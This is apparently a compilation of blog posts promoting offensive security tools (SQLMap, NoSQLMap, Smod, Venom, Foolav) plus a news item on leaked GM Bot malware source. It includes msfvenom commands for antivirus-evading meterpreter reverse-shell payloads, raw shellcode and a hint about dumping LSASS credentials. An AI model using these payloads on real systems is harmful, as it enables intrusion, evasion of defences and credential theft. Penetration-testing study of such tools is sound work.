The Simple, Clear, CouchDB Security Assessment - Audit CouchDB

Audit CouchDB is a simple tool with a powerful message. Given an Apache CouchDB URL, it will tell you everything you ever wanted to know about its security.

Objective

Audit CouchDB will perform the following actions:

1. Learn every possible fact about the couch, for example:
   
   • What is the server configuration?
   • What user accounts exist?
   • What user roles exist?
   • What databases exist?
   • In each database, what is the security setting?
   • In each design document, what are the validation functions?
2. Given the facts, compare them against each other and warn if they imply a security concern, for example:
   
   • You obviously didn't bother to click the "Security" link in the database page in Futon
   • Published CVE alerts apply to your version of CouchDB
   • A design document is missing a validate_doc_update function
   • Helpful summaries of how many admins, normal users, and anonymous users can access each database

Usage

Currently, Audit CouchDB is a Node application distributed via NPM. Install it (globally) via npm.

npm install -g audit_couchdb

Next, run the tool with your CouchDB URL as a parameter. You should connect as an admin user, so Audit CouchDB can fetch all possible information (such as the configuration).

audit_couchdb https://admin:secret@localhost:5984

The tool will output everything it knows about your couch's security.
To see how audit_couchdb is working, set its log level to debug. It will show you each query it makes as it learns facts about your couch.

audit_couchdb --level=debug https://admin:secret@localhost:5984

Running from the Browser

Audit CouchDB is implemented as a library, depending on a back-end request library, and a front-end to display the output (simple console text output, or log4j if it is installed).
I recently re-implemented request in the browser as jQuery Request . Thus I am excited to see Audit CouchDB run on the browser, however I have not begun this work.

Download Audit CouchDB

Read More

Automatic SQL Injection And Database Takeover Tool - SQLMap

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features

• Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB and HSQLDB database management systems.
• Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
• Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
• Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
• Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
• Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
• Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
• Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
• Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
• Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
• Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

Refer to the wiki for an exhaustive breakdown of the features.

Download SQLMap

Read More

Most Secure Peer-to-Peer Encrypted Messenger that Sends No Metadata - Ricochet

There are several encrypted messaging apps for mobile and desktop platforms that shipped with "The Most Secure" tagline but ends up in de-anonymizing the real identity of its users in some or the other way.

In fact, very few encrypted messaging apps available today deal with the core problem of Metadata. 

The majority of apps offer end-to-end encryption that kept the content of your messages away from prying eyes, but your metadata will still be accessible to them, which is enough to know who you really are, and who you're talking to.

But, one messenger app stands out of the crowd by providing superb anonymity to its users, and it is dubbed as "Ricochet."

Ricochet is a peer-to-peer instant messaging system available for Windows, Mac, and Linux and you can trust it as the app has already cleared its first professional security audit carried out by cyber security company NCC Group.

What's so Promising about Ricochet?

Unlike other encrypted messaging clients, Ricochet makes use of TOR hidden services in an effort to maintain its users’ anonymity.

With the help of hidden services, a user's traffic never leaves The Onion Router (TOR) network, which makes it much harder for prying eyes or any attacker to see where the traffic is going or coming from.

Peer-to-Peer Connection: No Servers! No Operators!

Ricochet does not trust anyone in maintaining the privacy of its users; thus, the developers have implemented their app with no server or operator support that could be compromised exposing your personal details.

"The concept with Ricochet is: how can we do messaging without any server in the middle—without trusting anything to forward your messages to your contacts" John Brooks (Ricochet program's maintainer) stated.

"That turns out to be exactly one of the problems that hidden services can solve: to contact someone, without anybody in the middle knowing who you are or who you're contacting."

Here's How Ricochet Works

Ricochet supports cross-platform and is very easy to use even for non-technical users.

Your Username: A Unique .Onion Address

Every Ricochet client hosts a Tor hidden service, and once you sign up for Ricochet, that is actually your Ricochet ID: a unique .onion address.

Only the one with this .onion address can contact you and send messages, which means the contacts connect to you through Tor and not through any intermediate server, making it extremely harder for anyone to know your real identity from your address.

Ricochet Creates Huge Spike in Hidden Addresses

Security researcher Alan Woodward has noticed an unprecedented spike in the number of unique .onion hidden addresses on the Tor network in month of February.

The Statistics shared by the Tor project shows that the number of unique .onion sites has increased by more than 25,000 within 2-3 days.

Researcher believed that this sudden rise could be due to the popularity of Ricochet that creates unique .onion address for every registered user.

Your Messages: End-to-End Encrypted By Default

Besides this, Ricochet also encrypts the contents of your messages by default.

So, to start chatting with someone over Ricochet, you should first know his/her unique Ricochet ID that is being auto-generated at the time of the Ricochet Installation.

Moreover, once the connection is terminated by either the sender or the receiver, the remaining one would not be able to communicate or send messages to the other.

Ricochet Takes Your Security Seriously

The audit by NCC Group discovered a security flaw that could be exploited to deanonymize users, but the good news is that the issue has been resolved in the latest release, Ricochet 1.1.2.

The security vulnerability was independently discovered by a member of the Ricochet community.

Ricochet has been around since 2014 and is now far secured than any other existing encrypted messaging apps. But the app is still in the dogfooding stage, as Brooks referred to the "Be Careful" statement on the project's official website:

"Ricochet is an experiment. Security and anonymity are difficult topics, and you should carefully evaluate your risks and exposure with any software."

Download Ricochet

Read More

GM Bot (Android Malware) Source Code Leaked Online

The source code of a recently discovered Android banking Trojan that has the capability to gain administrator access on your smartphone and completely erase your phone's storage has been LEAKED online.

The banking Trojan family is known by several names; Security researchers from FireEye dubbed it SlemBunk, Symantec dubbed it Bankosy, and last week when Heimdal Security uncovered it, they dubbed it MazarBot.

All the above wave of Android banking Trojans originated from a common threat family, dubbed GM Bot, which IBM has been tracking since 2014.

GM Bot emerged on the Russian cybercrime underground forums, sold for $500 / €450, but it appears someone who bought the code leaked it on a forum in December 2015, the IBM X-Force team reported.

What is GM Bot and Why Should You Worry about it?

The recent version of GM Bot (dubbed MazarBOT) has the capability to display phishing pages on the top of mobile banking applications in an effort to trick Android users into handing over their financial credentials to the fraudsters.

Besides this, the banking trojan is also capable of forwarding phone calls and intercepting SMS messages to help fraudsters bypass an additional layer of bank security mechanisms, and locking a device’s screen.

Cyber criminals could also use the malware to:

• Spy on victims
• Delete data from the infected device
• Gain boot persistence to help survive device restart
• Send and Read your SMS message
• Make Calls to your contacts
• Read the phone's state
• Plague phone's control keys
• Infect your Chrome browser
• Change phone settings
• Force the phone into sleep mode
• Query the network status
• Access the Internet
• Wipe your device's storage (the most critical capabilities of the malware)

However, someone leaked the malware source code only to boost his/her reputation on an underground forum, according to the researchers.

GM Bot Android Malware Source Code for FREE

Yes, the source code for GM Bot and its control panel is now accessible to cybercriminals and fraudsters for FREE.

Here’s the Cherry on the Top:

Besides the source code, the leader also posted a tutorial and instructions for server-side installation, which means cybercriminals can create their own versions of the malware strain to conduct online banking frauds.

Though the archive file containing the source code and its control panel is password protected, the leader is offering the password only to active forum members who is approaching him.

"Those who received the password, in turn, passed it on to other, unintended users, so the actual distribution of the code went well beyond that discussion board’s member list," IBM cyber security evangelist Limor Kessem wrote in a blog post.

Online users had started sharing the password to the archive among their friends, and in no time, the GM Bot source code was all over the hacking underground forums.

GM Bot is one of the most dangerous banking trojan in the Android ecosystem and after its source code gets leaked, users are recommended to beware while banking online.

How to Protect Yourself?

As I previously mentioned, online users are advised to follow these steps in order to protect themselves against this kind of threat:

• Never open attachments from unknown sources.
• Never click on links in SMS or MMS messages sent to your phone.
• Even if the email looks legit, go directly to the source website and verify any possible updates.
• Go to Settings → Security → Turn OFF "Allow installation of apps from sources other than the Play Store" option.
• Always keep an up-to-date Anti-virus app on your Android devices.
• Avoid unknown and unsecured Wi-Fi hotspots and Keep your Wi-Fi turned OFF when not in use.

Source: Hackers News

By Offensive Sec

Read More

MODBUS Penetration Testing Framework - Smod

Smod is a modular framework with every kind of diagnostic and offensive feature you could need in order to pentest modbus protocol. It is a full Modbus protocol implementation using Python and Scapy. This software could be run on Linux/OSX under python 2.7.x.

Feel free to make pull requests, if there's anything you feel we could do better.

Summery

SCADA (Process Control Networks) based systems have moved from proprietary closed networks to open source solutions and TCP/IP enabled networks steadily over recent years. This has made them vulnerable to the same security vulnerabilities that face our traditional computer networks.

The Modbus/TCP protocol was used as the reference protocol to display the effectiveness of the test bed in carrying out cyber attacks on a power system protocol. Modbus/TCP was chosen specifically for these reasons:

• modbus is still widely used in power systems.
• modbus/TCP is simple and easy to implement.
• modbus protocol libraries are freely available for utilities to implement smart grid applications.

You can use this tool to vulnerability assessment a modbus protocol.

Demo

Just a little demo showing off the basics

root@kali:~/smod# python smod.py 
 _______ 
< SMOD >
 ------- 
        \   ^__^
         \  (xx)\_______
            (__)\       )\/\
             U  ||----w |
                ||     ||
          --=[MODBUS Penetration Test FrameWork
       --+--=[Version : 1.0.2
       --+--=[Modules : 14
       --+--=[Coder   : Farzin Enddo
          --=[github  : www.github.com/enddo

SMOD >help
 Command  Description                                      
 -------  -----------                                      
 back     Move back from the current context               
 exit     Exit the console                                 
 exploit  Run module                                       
 help     Help menu                                        
 show     Displays modules of a given type, or all modules 
 set      Sets a variable to a value                       
 use      Selects a module by name                         
SMOD >show modules
 Modules                              Description                             
 -------                              -----------
 modbus/dos/galilRIO                  DOS Galil RIO-47100 
 modbus/dos/writeSingleCoils          DOS With Write Single Coil Function     
 modbus/dos/writeSingleRegister       DOS Write Single Register Function      
 modbus/function/readCoils            Fuzzing Read Coils Function             
 modbus/function/readDiscreteInput    Fuzzing Read Discrete Inputs Function   
 modbus/function/readExceptionStatus  Fuzzing Read Exception Status Function  
 modbus/function/readHoldingRegister  Fuzzing Read Holding Registers Function 
 modbus/function/readInputRegister    Fuzzing Read Input Registers Function   
 modbus/function/writeSingleCoils     Fuzzing Write Single Coil Function      
 modbus/function/writeSingleRegister  Fuzzing Write Single Register Function  
 modbus/scanner/discover              Check Modbus Protocols                  
 modbus/scanner/getfunc               Enumeration Function on Modbus          
 modbus/scanner/uid                   Brute Force UID      
 modbus/sniff/arp                     Arp Poisoning
SMOD >

Brute Force Modbus UID

SMOD >use modbus/scanner/uid
SMOD modbus(uid) >show options
 Name      Current Setting  Required  Description                                 
 ----      ---------------  --------  -----------                                 
 Function  1                False     Function code, Defualt:Read Coils.          
 Output    True             False     The stdout save in output directory         
 RHOSTS                     True      The target address range or CIDR identifier 
 RPORT     502              False     The port number for modbus protocol         
 Threads   1                False     The number of concurrent threads            
SMOD modbus(uid) >set RHOSTS 192.168.1.6
SMOD modbus(uid) >exploit 
[+] Module Brute Force UID Start
[+] Start Brute Force UID on : 192.168.1.6
[+] UID on 192.168.1.6 is : 10
SMOD modbus(uid) >

Enumeration Function on Modbus

SMOD >use modbus/scanner/getfunc
SMOD modbus(getfunc) >show options
 Name     Current Setting  Required  Description                                 
 ----     ---------------  --------  -----------                                 
 Output   True             False     The stdout save in output directory         
 RHOSTS                    True      The target address range or CIDR identifier 
 RPORT    502              False     The port number for modbus protocol         
 Threads  1                False     The number of concurrent threads            
 UID      None             True      Modbus Slave UID.                           
SMOD modbus(getfunc) >set RHOSTS 192.168.1.6
SMOD modbus(getfunc) >set UID 10
SMOD modbus(getfunc) >exploit 
[+] Module Get Function Start
[+] Looking for supported function codes on 192.168.1.6
[+] Function Code 1(Read Coils) is supported.
[+] Function Code 2(Read Discrete Inputs) is supported.
[+] Function Code 3(Read Multiple Holding Registers) is supported.
[+] Function Code 4(Read Input Registers) is supported.
[+] Function Code 5(Write Single Coil) is supported.
[+] Function Code 6(Write Single Holding Register) is supported.
[+] Function Code 7(Read Exception Status) is supported.
[+] Function Code 8(Diagnostic) is supported.
[+] Function Code 15(Write Multiple Coils) is supported.
[+] Function Code 16(Write Multiple Holding Registers) is supported.
[+] Function Code 17(Report Slave ID) is supported.
[+] Function Code 20(Read File Record) is supported.
[+] Function Code 21(Write File Record) is supported.
[+] Function Code 22(Mask Write Register) is supported.
[+] Function Code 23(Read/Write Multiple Registers) is supported.
SMOD modbus(getfunc) >

Fuzzing Read Coils Function

SMOD >use modbus/function/readCoils
SMOD modbus(readCoils) >show options
 Name       Current Setting  Required  Description                                 
 ----       ---------------  --------  -----------                                 
 Output     True             False     The stdout save in output directory         
 Quantity   0x0001           True      Registers Values.                           
 RHOSTS                      True      The target address range or CIDR identifier 
 RPORT      502              False     The port number for modbus protocol         
 StartAddr  0x0000           True      Start Address.                              
 Threads    1                False     The number of concurrent threads            
 UID        None             True      Modbus Slave UID.                           
SMOD modbus(readCoils) >set RHOSTS 192.168.1.6
SMOD modbus(readCoils) >set UID 10
SMOD modbus(readCoils) >exploit 
[+] Module Read Coils Function Start
[+] Connecting to 192.168.1.6
[+] Response is :
###[ ModbusADU ]###
  transId   = 0x2
  protoId   = 0x0
  len       = 0x4
  unitId    = 0xa
###[ Read Coils Answer ]###
     funcCode  = 0x1
     byteCount = 1L
     coilStatus= [0]
SMOD modbus(readCoils) >

Download Smod

Read More

Pentest Tool For Antivirus Evasion and Running Arbitrary Payload on Target Wintel Host - Foolav

Executable compiled with this code is useful during penetration tests where there is a need to execute some payload (meterpreter maybe?) while being certain that it will not be detected by antivirus software. The only requirement is to be able to upload two files: binary executable and payload file into the same directory.

Usage steps

1. prepare your payload (x86), i.e.
   calc: msfvenom -p windows/exec CMD=calc.exe EXITFUNC=thread -e x86/shikata_ga_nai -b "\x00\x0a\x0d\xff" -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf (you dont really need to use any encoder or characters blacklisting, it will work anyway)
   meterpreter: msfvenom -p windows/meterpreter_reverse_tcp LHOST=... -a x86 -f c 2>/dev/null | egrep "^\"" | tr -d "\"\n;" >foolav.mf
   
2. copy payload file [executable-name-without-exe-extension].mf in the same directory as executable payload running calc.exe generated using above command: # calc.exe \xbb\x28\x30\x85\x5b\xd9\xf7\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1\x33\x83\xea\xfc\x31\x5a\x0e\x03\x72\x3e\x67\xae\x7e\xd6\xee\x51\x7e\x27\x91\xd8\x9b\x16\x83\xbf\xe8\x0b\x13\xcb\xbc\xa7\xd8\x99\x54\x33\xac\x35\x5b\xf4\x1b\x60\x52\x05\xaa\xac\x38\xc5\xac\x50\x42\x1a\x0f\x68\x8d\x6f\x4e\xad\xf3\x80\x02\x66\x78\x32\xb3\x03\x3c\x8f\xb2\xc3\x4b\xaf\xcc\x66\x8b\x44\x67\x68\xdb\xf5\xfc\x22\xc3\x7e\x5a\x93\xf2\x53\xb8\xef\xbd\xd8\x0b\x9b\x3c\x09\x42\x64\x0f\x75\x09\x5b\xa0\x78\x53\x9b\x06\x63\x26\xd7\x75\x1e\x31\x2c\x04\xc4\xb4\xb1\xae\x8f\x6f\x12\x4f\x43\xe9\xd1\x43\x28\x7d\xbd\x47\xaf\x52\xb5\x73\x24\x55\x1a\xf2\x7e\x72\xbe\x5f\x24\x1b\xe7\x05\x8b\x24\xf7\xe1\x74\x81\x73\x03\x60\xb3\xd9\x49\x77\x31\x64\x34\x77\x49\x67\x16\x10\x78\xec\xf9\x67\x85\x27\xbe\x88\x67\xe2\xca\x20\x3e\x67\x77\x2d\xc1\x5d\xbb\x48\x42\x54\x43\xaf\x5a\x1d\x46\xeb\xdc\xcd\x3a\x64\x89\xf1\xe9\x85\x98\x91\x6c\x16\x40\x78\x0b\x9e\xe3\x84
3. once executable is run, payload file will be parsed, loaded into separate thread and executed in memory: 
4. 

Hints

• x86 binary will run on both x86 and x86_64 Windows systems. Still, you need to use x86 architecture payloads. Nevertheless, x86 meterpreter payload can be migrated to x86_64 processes. After that, load kiwi will load x86_64 version making it possible to access juicy contents of LSASS process memory :)
  
  
  
  
• .mf payload file can be obfuscated - parser will ignore every character other than \xHH hexdecimal sequences. This means, it can append your payload to almost any file, hide it between the lines or even add your own comments, example:
  

Download Foolav

Read More

Vulnerability Scanner With Custom Payload - PyScan-Scanner

REQUIRE

• urllib2
• BeautifulSoup
• requests

START

• Change database information

$bdd = new PDO('mysql:host=localhost;dbname=pyscan', 'user', 'password');

• Update a Python gate

panel_url = "http://localhost/pyscan/"
gate_scraper = "cmd/gate.php"
gate_scanner = "cmd/scan.php"
gate_vuln = "cmd/vuln.php"
gate_payload = "panel/api/payload.php"
gate_database = "panel/api/database.php"

Upload the .SQL

mysql -u username -p database_name < file.sql

Login

Username: root
password: toor

Make payload !

Test payload

python pyscan.py -u "http://exemple.com/id=2" -s -p PAYLOAD_ID

Test all payload

python pyscan.py -u "http://exemple.com/id=2" -s --all

Import mass link

Test all link

python pyscan.py --database

Download Pyscan-Scanner

Read More

Automated NoSQL Database Pwnage - NoSQLMap v0.6

NoSQLMap is an open source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases, as well as web applications using NoSQL in order to disclose data from the database.  It is named as a tribute to Bernardo Damele and Miroslav's Stampar's popular SQL injection tool SQLmap, and its concepts are based on and extensions of Ming Chow's excellent presentation at Defcon 21, "Abusing NoSQL Databases".  Presently the tool's exploits are focused around MongoDB, but additional support for other NoSQL based platforms such as CouchDB, Redis, and Cassandra are planned in future releases.  The current project goals are to provide a penetration testing tool to simplify attacks on MongoDB servers and web applications as well as proof of concept attacks to debunk the premise that NoSQL applications are impervious to SQL injection.

Features

• Automated MongoDB and CouchDB database enumeration and cloning attacks.
• Extraction of database names, users, and password hashes through MongoDB web applications.
• Scanning subnets or IP lists for MongoDB and CouchDB databases with default access and enumerating versions.
• Dictionary and brute force password cracking of recovered MongoDB and CouchDB hashes.
• PHP application parameter injection attacks against MongoClient to return all database records.
• Javascript function variable escaping and arbitrary code injection to return all database records.
• Timing based attacks similar to blind SQL injection to validate Javascript injection vulnerabilities with no feedback from the application.
• More coming soon!

Release History

0.6 builds (Written entirely by wonderful contributors in the Github community, thanks so much!):

• Web app attacks-Added support for sending user supplied headers (thanks gpapakyriakopoulos)
• Web app attacks-Migrated all requests from urllib to urllib2 to support header input (thanks gpapakyriakopoulos)
• Bugfix-No URL parameter supplied with GET method would result in an AttributeError Exception (thanks gpapakyriakopoulos)
• Interface-Corrected spelling errors in output (thanks akash0x53)
• Setup-New installation process added which uses Python's setuptools instead of relying on BASH and successful dependency installs (thanks akash0x53)
• Code cleanup-Stripped off trailing whitespaces (thanks akash0x53)

0.5 builds:

v0.5 (MAJOR RELEASE):

• Web app attacks-Added $gt no value attack for PHP/ExpressJS applications.  Thanks go to Petko D. Petkov for this one!
• Web app attacks-Corrected labeling to reflect associative array attacks affecting both PHP and ExpressJS.
• General-Phase III of code cleanup project; each NoSQL platform is now a free standing Python module that can be imported into other code.
• Scanner-Added support for CouchDB scanning and version recording.
• Net attacks-Added support for CouchDB network level and access attacks including database replication and password cracking.
• General-Added "Change Platform" to Main Menu to toggle between NoSQL platforms and automatically set the correct options.

0.4 builds:

v0.4b:

• Bugfix:  Fixed condition which caused net attack authentication not to work.

v0.4a:

• Implemented better Python structure for startup and exception handling.

v0.4 (GIANT MAJOR RELEASE!):

• Web app attacks-Added HTTPS support
• Web app attacks-Added logic for detecting and reporting NoSQL errors returned by the web application to reduce false positives and provide additional insight into injection vectors.
• General-Phase II of code cleanup and organization project.
• MongoDB Scanner-The scanner now records the version of MongoDB detected on the server.
• MongoDB Scanner-Filtered MongoDB targets with non-default access model from results/target list.
• MongoDB Scanner-Set socket timeouts for massive speed improvements over previous versions.
• MongoDB Scanner-Added the ability to ping the host before trying to establish a MongoDB connection.
• MongoDB Scanner-Added option to save scanner results to a CSV file.
• Password Cracker-Added brute forcing for password cracking.
• Net Attacks-Changed attacks to menu-driven interface for direct access to the needed attack instead of having to go through yes/no menus for all attacks.
• Net Attacks-Added automated testing to check and see if the MongoDB server needs credentials and prompts if needed instead of asking the user to specify.

0.3 builds:

v0.31:

• Changed code for yes/no input handling.
• Fixed crash which occurred when the web application did not return an HTTP 200 response.

v0.3 (MAJOR RELEASE!):

• Added beta support for injection testing using POST requests.
• Added the ability to extract the database name, database usernames, and password hashes on a vulnerable web application on MongoDB <2.4.
• Added general MongoDB version detection from injection results (<2.4 or >2.4).
• Added the ability to target MongoDB servers running on a port other than the default of 27017.
• Added user input validation for legal IP addresses.
• Added toggle for verbose output or a default standard output.
• UI cleanup and enhancements.
• Added clean exit with CTRL+C.
• Bugfix:  Resolved the inability to specify targets by hostname.
• Bugfix:  Resolved crash trying to enumerate GridFS if the specified credentials can't enumerate databases.
• Bugfix:  Resolved crash trying to steal databases if the specified credentials can't enumerate databases.
• Bugfix:  Added graceful handling if no destination IP is set for database cloning.
• Consolidated results checking into one function for easier logic enhancements.
• Implemented first phase of a massive code cleanup.
• Added slick ASCII art banner :-)

0.2 builds:

v0.2 (MAJOR RELEASE!):

• Added integrated scanner of a subnet or IP list for default MongoDB access and ability to send targets directly to NoSQLMap.
• Added dictionary attacks on stored MongoDB password hashes contributed by Josh Tower.
• Added an installer shell script to automate dependency installation on Debian and Red Hat systems.
• Added enumeration of files stored inside GridFS.
• Added parsing of saved HTTP requests from Burp Suite to populate options.
• Added notification if a database was replicated, but text indexes could not be moved.
• Fixed some minor interface bugs and added UI improvements, such as headings for each module when they are executed.
• Miscellaneous code cleanup and bugfixes.

0.1 builds:

v0.15b-Added error handling for exceptions thrown when parsing URLs/parameters and options are set incorrectly.

v0.15a-Fixed critical issue that caused web app testing to crash in certain conditions; Fixed issue causing extra & to be added to the end of .this injection URLs.

v0.15-Added Mongo authentication support; Added collection name enumeration; added extraction of database users, roles, and password hashes;  fixed bug with loading options file that caused attacker's local IP not to load. 

v0.1(MAJOR RELEASE!):

• Added this not equals injection attack to return all database records.
• Added timing based attacks similar to traditional blind SQL injection.
• Output can now be saved to a file.
• Made small UI improvement to the URL parameter selection.
• Added ability to load and save attack options.
• Added ability to select injected random parameter format (i.e. alphanumeric, letters only, numbers only, email address)
• Fixed crash when web application doesn't respond to base request.

0.0 builds:

v0.09-Improved output; fixed bug with integer injection testing; added some code comments.

v0.08a-Fixed broken Metasploit exploit launching for Mongo targets.

v0.08-Several error handling corrections and general bugfixes; UI enhancements to the options menu.

v0.06-Initial public release.

The Future

• More platform support
• More complex attacks
• Better exploits
• Slicker code

Requirements

On a Debian or Red Hat based system, the setup.sh script may be run as root to automate the installation of NoSQLMap's dependencies.

Varies based on features used:

• Metasploit Framework,
• Python with PyMongo,
• httplib2,
• and urllib available.
• A local, default MongoDB instance for cloning databases to. Check here for installation instructions.

There are some various other libraries required that a normal Python installation should have readily available. Your milage may vary, check the script.

Setup

sudo python setup.py install

Usage

Start with

NoSQLMap

NoSQLMap uses a menu based system for building attacks. Upon starting NoSQLMap you are presented with with the main menu:

1-Set options (do this first)
2-NoSQL DB Access Attacks
3-NoSQL Web App attacks
4-Scan for Anonymous MongoDB Access
x-Exit

Explanation of options:

1. Set target host/IP-The target web server (i.e. www.google.com) or MongoDB server you want to attack.
2. Set web app port-TCP port for the web application if a web application is the target.
3. Set URI Path-The portion of the URI containing the page name and any parameters but NOT the host name (e.g. /app/acct.php?acctid=102).
4. Set HTTP Request Method (GET/POST)-Set the request method to a GET or POST; Presently only GET is implemented but working on implementing POST requests exported from Burp. 
5. Set my local Mongo/Shell IP-Set this option if attacking a MongoDB instance directly to the IP of a target Mongo installation to clone victim databases to or open Meterpreter shells to.
6. Set shell listener port-If opening Meterpreter shells, specify the port.
7. Load options file-Load a previously saved set of settings for 1-6.
8. Load options from saved Burp request-Parse a request saved from Burp Suite and populate the web application options.
9. Save options file-Save settings 1-6 for future use.
x. Back to main menu-Use this once the options are set to start your attacks.

Download NoSQLMap

Read More

Metasploit Shellcode Generator / Compiler / Listenner - Venom

The script will use msfvenom (metasploit) to generate shellcode in diferent formats ( c | python | ruby | dll | msi | hta-psh ), injects the shellcode generated into one funtion (example: python) "the python funtion will execute the shellcode in ram" and uses compilers like: gcc (gnu cross compiler) or mingw32 or pyinstaller to build the executable file, also starts a multi-handler to recibe the remote connection (reverse shell or meterpreter session).

'shellcode generator' tool reproduces some of the technics used by Veil-Evasion framework, unicorn.py, powersploit, etc,etc,etc.."P.S. some payloads are undetectable by AV soluctions yes!!!" one of the reazons for that its the use of a funtion to execute the 2º stage of shell/meterpreter directly into targets ram.

option	build	target	format	output
1	shellcode	unix	C	C
2	shellcode	windows	C	DLL
3	shellcode	windows	DLL	DLL
4	shellcode	windows	C	PYTHON/EXE
5	shellcode	windows	C	EXE
6	shellcode	windows	MSIEXEC	MSI
7	shellcode	windows	C	RUBY
8	shellcode	windows	POWERSHELL	BAT
9	shellcode	windows	HTA-PSH	HTA
10	shellcode	windows	PSH-CMD	PS1
11	shellcode	windows	PSH-CMD	BAT
12	shellcode	webserver	PHP	PHP
13	shellcode	multi OS	PYTHON(base64)	PYTHON

Download Venom

Read More